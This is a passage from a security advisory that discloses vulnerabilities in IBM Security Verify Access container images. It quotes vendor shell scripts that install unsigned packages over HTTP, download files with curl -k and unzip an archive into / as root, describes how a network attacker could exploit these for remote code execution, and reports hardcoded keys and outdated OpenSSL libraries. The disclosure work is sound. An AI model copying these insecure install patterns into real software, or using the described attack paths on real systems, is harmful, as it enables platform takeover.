$sofl_repo_file\n[/code]\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n [isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo \n [sofl]\n name=Symas OpenLDAP for Linux RPM repository\n baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8\n gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key\n gpgcheck=1\n enabled=1\n [isam@verify-access-runtime /]$\n\nWhen reading the `/usr/sbin/install_system.sh` script, this repository is used to install an additional package, without checking the signature:\n\n[code:shell]\n58 #\n59 # We want to manually install the openldap server RPM as microdnf pulls\n60 # in a whole heap of dependencies which we don\u0027t require. \n61 #\n62 \n63 baseurl=`grep baseurl $sofl_repo_file | cut -f 2 -d \u0027=\u0027`/x86_64\n64 version=`rpm -q --qf \"%{VERSION}-%{RELEASE}\" symas-openldap`\n65 rpmfile=/tmp/openldap.rpm\n66 \n67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile\n68 \n69 rpm -i --nodeps $rpmfile\n70 \n71 rm -f $rpmfile\n[/code]\n\nThere is a potential supply-chain attack and this dependency is not documented. \n\n\n\n## Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure `/usr/sbin/install_system.sh` script. \n\nWith the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and\nRemote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh),\nthis version adds 2 new vulnerabilities:\n\n- - Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and\n- - Replacement of `/usr/share/java/postgresql-jdbc/postgresql.jar` using a postgresql.jar file directly retrieved over HTTP (line 99) and with `-k` (aka `--insecure`). \n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n73 #\n74 # For the postgresql packages we need to download and install manually so\n75 # that we don\u0027t also pull in all of the unnecessary dependencies. \n76 #\n77 \n78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/\n79 \n80 rpms=/tmp/rpms.txt\n81 \n82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms\n83 \n84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do\n85 rpm_file=`grep $pkg $rpms | tail -n 1 | \\\n86 sed \u0027s|.*href=\"||g\u0027 | cut -f 1 -d \u0027\"\u0027`\n87 \n88 echo \"Installing: $rpm_file\"\n89 \n90 rpm -i --nodeps $centos_base/$rpm_file\n91 done\n92 \n93 rm -f $rpms\n94 \n95 #\n96 # Need a more current jar then what is part of the postges-jdbc rpm\n97 #\n98 postgres_jar=`locate_file postgresql-.*.jar`\n99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar\n[/code]\n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform. \n\nNote that IBM does not consider this vulnerability since the script is supposed to be executed in a secure network. \n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-runtime:\n\n[code:shell]\n239 #\n240 # Ensure that the reload script is executable. \n241 #\n242 \n243 mv /sbin/reload.sh /sbin/runtime_reload\n244 \n245 chmod 755 /sbin/runtime_reload\n[/code]\n\nAnalysis of `/sbin/runtime_reload`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nWe can also see that Postgres does not have passwords in line 144, already found in [Lack of authentication in Postgres inside verify-access-runtime](#no-auth-postgres). \n\n\n\n[code:shell]\n 67 #############################################################################\n 68 # Attempt to download the snapshot from the configuration service. \n 69 \n 70 download_from_cfgsvc()\n 71 {\n 72 # No need to download the snapshot if the configuration service has not\n 73 # been defined. \n 74 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 75 return\n 76 fi\n 77 \n 78 if [ $1 -eq 1 ] ; then\n 79 Echo 960\n 80 fi\n 81 \n 82 curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n 83 \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n 84 -o $snapshot\n 85 \n 86 if [ $? -ne 0 ] ; then\n 87 if [ $1 -eq 1 ] ; then\n 88 Echo 961\n 89 fi\n 90 \n 91 rm -f $snapshot\n 92 else\n 93 Echo 962\n 94 fi\n 95 }\n[...]\n 97 #############################################################################\n 98 # Main line. \n 99 \n100 #\n101 # Download the snapshot file. \n102 #\n103 \n104 download_from_cfgsvc 1\n[...]\n127 #\n128 # Update the configuration database. \n129 #\n130 \n131 Echo 997\n132 \n133 db_root=/var/postgresql/config\n134 db_snapshot=$db_root/snapshot.sql\n135 db_port=5432\n136 db_name=config\n137 db_user=www-data\n138 \n139 if [ ! -f $db_snapshot ] ; then\n140 Echo 975\n141 exit 1\n142 fi\n143 \n144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w\n\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-wrp\n\nIt was observed that the Docker image verify-access-wrp uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. He can also overwrite any file present in the verify-access-wrp docker instance (getting a Remote Code Execution). \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-wrp:\n\n[code:shell]\n210 #\n211 # Ensure that the restart script is executable. \n212 #\n213 \n214 mv /sbin/restart.sh /sbin/wrprestart\n215 \n216 chmod 755 /sbin/wrprestart\n[/code]\n\nAnalysis of `/sbin/wrprestart`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nThe `openldap.zip` file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the `/` directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious `slapd.conf` file (stored inside `openldap.zip`, in `etc/openldap/slapd.conf`). \n\nSince the extraction of `openldap.zip` takes place in `/`, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program). \n\n[code:shell]\n 85 #############################################################################\n 86 # Attempt to download the snapshot from the configuration service. \n 87 \n 88 download_from_cfgsvc()\n 89 {\n 90 # No need to download the snapshot if the configuration service has not\n 91 # been defined. \n 92 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 93 return\n 94 fi\n 95 \n 96 if [ $1 -eq 1 ] ; then\n 97 Echo 960\n 98 fi\n 99 \n100 curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n101 \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n102 -o $snapshot\n103 \n104 if [ $? -ne 0 ] ; then \n105 if [ $1 -eq 1 ] ; then \n106 Echo 961 \n107 fi\n108 \n109 rm -f $snapshot\n110 else\n111 Echo 962\n112 fi\n113 }\n[...]\n137 #############################################################################\n138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. \n139 \n140 restart_openldap_server()\n141 {\n142 # Check to see whether the embedded LDAP server has been enabled or\n143 # not. \n144 ldap_conf=\"/var/PolicyDirector/etc/ldap.conf\"\n145 ldap_host=`$pdconf -f $ldap_conf getentry ldap host`\n146 \n147 if [ \"$ldap_host\" != \"127.0.0.1\" ] ; then\n148 return\n149 fi\n150 \n151 Echo 964\n152 \n153 # Decrypt and extract the LDAP configuration. \n154 isva_decrypt $snapshot_tmp_dir/openldap.zip\n155 \n156 unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n157 \n158 # Change the LDAP port from 389 to 6389 (389 is a privileged port). \n159 $pdconf -f $ldap_conf setentry ldap port 6389\n160 \n161 # Stop the LDAP server. \n162 busybox killall -SIGHUP slapd\n163 \n164 while $(busybox killall -0 slapd 2\u003e/dev/null); do\n165 sleep 1\n166 done\n167 \n168 # Start the LDAP server. \n169 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n170 }\n[...]\n260 #############################################################################\n261 # Main line. \n262 \n263 #\n264 # Attempt to download the configuration data from the configuration service. \n265 #\n266 \n267 #\n268 # Wait for the snapshot file. \n269 #\n270 \n271 download_from_cfgsvc 1\n[...]\n305 #\n306 # Restart the OpenLDAP server. \n307 #\n308 \n309 restart_openldap_server\n[/code]\n\n\n\n## Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n\nIt was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:\n\n kali-docker# pwd \n /home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum\n \n kali-docker# ls -al \n total 492 \n drwxr-xr-x 2 root root 4096 Jun 8 01:43 . \n drwxr-xr-x 25 root root 4096 Jun 8 04:09 .. \n -rwxr-xr-x 1 root root 1296 Oct 20 2016 externalTrustSettings.xml\n -rwxr-xr-x 1 root root 445080 Oct 20 2016 iss-external.kdb\n -rwxr-xr-x 1 root root 129 Oct 20 2016 iss-external.sth\n -rwxr-xr-x 1 root root 100 Oct 20 2016 iss-lum.conf\n -rwxr-xr-x 1 root root 3649 Oct 20 2016 isslum-usLocalSettings.xml\n -rwxr-xr-x 1 root root 725 Oct 20 2016 lum_triggers.conf\n -rwxr-xr-x 1 root root 1858 Oct 20 2016 private.pem\n -rwxr-xr-x 1 root root 451 Oct 20 2016 public.pem\n -rwxr-xr-x 1 root root 3926 Oct 20 2016 .udrc\n -rwxr-xr-x 1 root root 806 Oct 20 2016 update-settings.conf\n -rwxr-xr-x 1 root root 7352 Oct 20 2016 update-status.xsd\n -rwxr-xr-x 1 root root 561 Jun 8 01:32 UpdateTypeNames.config\n -rwxr-xr-x 1 root root 0 Dec 31 1969 .wh..wh..opq\n\n kali-docker# sha256sum private.pem public.pem\n e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem\n 3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem\n\nWhen analyzing the podman instance verify-access, we can confirm the key has not been updated:\n\n [isam@verify-access lum]$ sha256sum private.pem public.pem\n e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem\n 3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem\n [isam@verify-access lum]$\n\nThe private key appears to be used by several programs:\n\n- - /opt/dca/bin/dcatool\n- - /usr/bin/isslum-modstatus\n- - /usr/sbin/iss-lum\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_eventsd\n- - /usr/sbin/isslum-installer\n\n\nThe license client is using outdated codes and may contain vulnerabilities. \n\nThe keys are hardcoded and have not been updated for 6 years, which brings a question how the license client is being maintained. \n\n\n\n## Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n\nIt was observed that the `dcatool` program located in `/opt/dca/bin` is linked with an outdated OpenSSL library located in the non-standard directory `/opt/dca/lib`:\n\n- From a live system:\n\n [isam@verify-access bin]$ pwd\n /opt/dca/bin\n [isam@verify-access bin]$ ls -la\n total 580\n drwxr-xr-x 2 root root 4096 Jun 8 13:43 . \n drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. \n -rwxr-xr-x 1 root root 373208 Jun 8 13:31 dcatool\n -rwxr-xr-x 1 root root 207872 Jun 8 13:31 dcaupdate\n [isam@verify-access bin]$ ldd dcatool | grep ssl\n libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000)\n libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fafcda45000)\n [isam@verify-access bin]$ ldd dcaupdate | grep ssl\n libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fe04980d000)\n libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fe047734000)\n\nAnalysis of the library:\n\n [isam@verify-access lib]$ pwd\n /opt/dca/lib\n [isam@verify-access lib]$ ls -la\n total 4156\n drwxr-xr-x 2 root root 4096 Jun 8 13:43 . \n drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. \n -rwxr-xr-x 1 root root 1252080 Jun 8 13:31 libboost_regex.so.1.53.0\n -rwxr-xr-x 1 root root 2521496 Jun 8 13:31 libcrypto.so.10\n lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicudata.so.54 -\u003e /usr/lib64/libicudata.so\n lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicui18n.so.54 -\u003e /usr/lib64/libicui18n.so\n lrwxrwxrwx 1 root root 22 Jun 8 13:43 libicuuc.so.54 -\u003e /usr/lib64/libicuuc.so\n -rwxr-xr-x 1 root root 470328 Jun 8 13:31 libssl.so.10\n [isam@verify-access lib]$ sha256sum *so*\n a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9 libboost_regex.so.1.53.0\n 8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c libcrypto.so.10\n 07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac libicudata.so.54\n 49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe libicui18n.so.54\n 1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972 libicuuc.so.54\n 523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 libssl.so.10\n [isam@verify-access lib]$\n\nWe can retrieve these 2 libraries inside the `ibmcom/verify-access` image and identify the version of OpenSSL:\n\n kali-docker# sha256sum **/libssl.so.10 \n 523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10\n kali-docker# sha256sum **/libcrypto.so.10 \n 8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10\n \n kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl\n [...][\n OpenSSL 1.0.2k-fips 26 Jan 2017\n [...]\n kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl\n OpenSSL 1.0.2k-fips 26 Jan 2017\n [...]\n\nThe libraries located in `/opt/dca/lib` are completely outdated and are vulnerable to known CVEs. \n\nThese libraries are likely used by IBM-specific programs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n\nIt was observed that the `/usr/sbin/iss-lum` program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers. \n\nThis program runs inside the instance:\n\n [isam@verify-access /]$ ps -auxw\n USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n isam 1 0.0 0.0 12060 132 ? Ss Oct04 0:00 /bin/sh /sbin/bootstrap.sh\n isam 313 0.0 0.0 24532 68 ? Ss Oct04 0:00 /usr/sbin/mesa_crashd\n isam 315 0.1 0.0 24532 1032 ? S Oct04 1:57 /usr/sbin/mesa_crashd\n isam 319 0.0 0.0 69160 144 ? Ss Oct04 0:00 /usr/sbin/mesa_syslogd\n isam 321 0.0 0.0 69224 1280 ? S Oct04 0:00 /usr/sbin/mesa_syslogd\n isam 400 0.0 0.0 102760 200 ? Ss Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 401 0.0 0.0 710856 316 ? Sl Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000\n pgresql 435 0.0 0.0 188380 7016 ? Ss Oct04 0:02 /usr/bin/postgres -D /var/postgresql/config/data\n pgresql 436 0.0 0.0 138892 184 ? Ss Oct04 0:00 postgres: logger \n pgresql 447 0.0 0.0 188380 1600 ? Ss Oct04 0:00 postgres: checkpointer \n pgresql 448 0.0 0.0 188516 1288 ? Ss Oct04 0:01 postgres: background writer \n pgresql 449 0.0 0.0 188380 1468 ? Ss Oct04 0:01 postgres: walwriter \n pgresql 450 0.0 0.0 189112 1864 ? Ss Oct04 0:01 postgres: autovacuum launcher \n pgresql 451 0.0 0.0 139024 588 ? Ss Oct04 0:05 postgres: stats collector \n pgresql 452 0.0 0.0 188916 1016 ? Ss Oct04 0:00 postgres: logical replication launcher \n www-data 548 0.4 4.8 4920352 387128 ? SLl Oct04 7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean\n isam 748 0.0 0.0 270992 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n ldap 753 0.0 4.3 1314228 346548 ? Sl Oct04 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n isam 757 0.0 0.0 271124 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n ivmgr 762 0.0 0.1 1070184 10860 ? Sl Oct04 0:01 /opt/PolicyDirector/bin/pdmgrd -foreground\n isam 805 0.0 0.0 71488 316 ? Ss Oct04 0:00 /usr/sbin/iss-lum\n isam 806 0.0 0.0 343920 5264 ? Sl Oct04 0:00 /usr/sbin/iss-lum\n root 811 0.0 0.0 41984 2416 ? Ss Oct04 0:00 /usr/sbin/crond\n isam 834 0.0 0.0 128400 2076 ? Ssl Oct04 0:00 /usr/sbin/rsyslogd\n root 859 0.0 0.0 174348 96 ? Ss Oct04 0:00 /usr/sbin/wga_servertaskd\n ivmgr 861 0.0 0.0 276544 84 ? Sl Oct04 0:00 /usr/sbin/wga_servertaskd\n isam 870 0.0 0.0 273920 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n isam 877 2.1 0.2 563872 18472 ? Sl Oct04 38:43 wga_notifications -foreground\n isam 889 0.0 0.0 12060 80 ? S Oct04 0:00 /bin/sh /sbin/bootstrap.sh\n isam 892 0.0 0.0 23068 24 ? S Oct04 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n isam 217541 4.0 0.0 19248 3836 pts/0 Ss 21:37 0:00 bash\n isam 217564 0.0 0.0 54808 4080 pts/0 R+ 21:37 0:00 ps -auxww\n [isam@verify-access /]$ \n\nThis program appears to establish connections to remote servers to check the license. \n\nThe OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, this program includes several hardcoded keys to decrypt the private key in `/etc/lum/private.pem`. In the function ctor_009:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nSome decryption keys have been identified within the binaries used to check the license:\n\nFunction `sub_4806C0`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFunction `ctor_009`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Outdated \"IBM Crypto for C\" library\n\nIt was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory `/usr/local/ibm/gsk8_64`:\n\nFor example, from the Docker image verify-access-wrp:\n\n kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a \n kali-docker# find usr/local/ibm \n usr/local/ibm\n usr/local/ibm/gsk8_64\n usr/local/ibm/gsk8_64/lib64\n usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so\n usr/local/ibm/gsk8_64/lib64/C\n usr/local/ibm/gsk8_64/lib64/C/icc\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt\n usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so\n usr/local/ibm/gsk8_64/lib64/N\n usr/local/ibm/gsk8_64/lib64/N/icc\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt\n usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt\n usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so\n usr/local/ibm/gsk8_64/docs\n usr/local/ibm/gsk8_64/copyright\n usr/local/ibm/gsk8_64/inc\n usr/local/ibm/gsk8_64/bin\n usr/local/ibm/gsk8_64/bin/gsk8capicmd_64\n usr/local/ibm/gsk8_64/bin/gsk8ver_64\n usr/local/ibm/.wh..wh..opq\n kali-docker#\n\nThis library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, the copyrights from the `/usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt` file indicate:\n\n- - (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib\n- - Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved. - for OpenSSL\n\nThe `/usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt` file confirms the libraries were generated 2 years ago:\n\n #\n # IBM Crypto for C. \n # ICC Version 8.7.37.0\n #\n # Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),\n # zlib (www.zlib.org)\n # and IBM code (www.ibm.com)\n #\n # Platform AMD64_LINUX\n #\n # Generated Tue Oct 13 12:09:08 2020\n #\n # File name=libicclib085.so\n # File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f\n #\n FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad\n #\n SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f\n #\n #Do not edit before this line\n #\n # Global Settings\n ICC_ALLOW_2KEY3DES=1\n\nThe OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Webseald using outdated code with remotely exploitable vulnerabilities\n\nIt was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. \nThis program can be found inside these 2 images:\n\n- - verify-access\n- - verify-access-wrp\n\nWebseald is reachable over the network. \n\nLibraries used by webseald:\n\n kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald\n linux-vdso.so.1 (0x00007fffe59f3000)\n libwsdaemon.so =\u003e not found\n libamwoauth.so =\u003e not found\n libamweb.so =\u003e not found\n libamwebrte.so =\u003e not found\n libpdsvcutl.so =\u003e not found\n libtivsec_msg.so =\u003e not found\n libpdz.so =\u003e not found\n libdl.so.2 =\u003e /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)\n libtivsec_xslt4c.so.112 =\u003e not found\n libtivsec_xml4c.so =\u003e not found\n libtivsec_yamlcpp.so =\u003e not found\n libam_gssapi_krb5.so =\u003e not found\n libmodsecurity.so.3 =\u003e not found\n libamwredismgr.so =\u003e not found\n libhiredis.so.0.15 =\u003e not found\n libhiredis_ssl.so.0.15 =\u003e not found\n libpthread.so.0 =\u003e /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)\n libstdc++.so.6 =\u003e /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)\n libm.so.6 =\u003e /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)\n libgcc_s.so.1 =\u003e /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)\n libc.so.6 =\u003e /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)\n /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)\n\nThe IBM-specific libraries (*.so*) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities. \n\nWebseal is directly reachable from the network but uses the outdated and vulnerable code. \n\nThe quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards. \n\nDue to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries. \n\n\n\n### Libmodsecurity.so - 